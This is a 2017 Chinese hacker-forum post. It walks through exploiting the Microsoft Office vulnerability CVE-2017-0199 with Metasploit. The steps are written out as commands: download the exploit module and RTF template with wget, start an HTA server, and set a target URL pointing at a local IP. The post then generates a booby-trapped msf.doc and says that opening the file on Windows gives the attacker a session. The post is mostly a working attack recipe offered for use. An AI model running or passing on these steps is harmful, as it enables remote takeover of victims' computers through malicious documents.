搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) CVE-2017-0199漏洞 MSF利用过程
返回列表 发新帖
查看: 410|回复: 0

CVE-2017-0199漏洞 MSF利用过程

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-4-28 11:22:47 | 显示全部楼层 |阅读模式
下载利用脚本
  1.        
  2. root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
复制代码
然后msf下执行命令reload_all重新加载模块

下载rtf文件到/usr/share/metasploit-framework/data/exploits目录
  1. cd /usr/share/metasploit-framework/data/exploits
  2. wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf
复制代码
开启HTA服务
  1. msf > use exploit/windows/misc/hta_server
  2. msf exploit(hta_server) > show options
  3. msf exploit(hta_server) > run
复制代码
生成EXPLOIT文档
  1. msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
  2. msf exploit(office_word_hta) > show options
  3. msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta
  4. msf exploit(office_word_hta) > set FILENAME msf.doc
  5. msf exploit(office_word_hta) > run
复制代码
将生成的msf.doc文件复制到windows上,打开即可获取一个会话
如下所示
WIndows下结果
Kali下结果



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表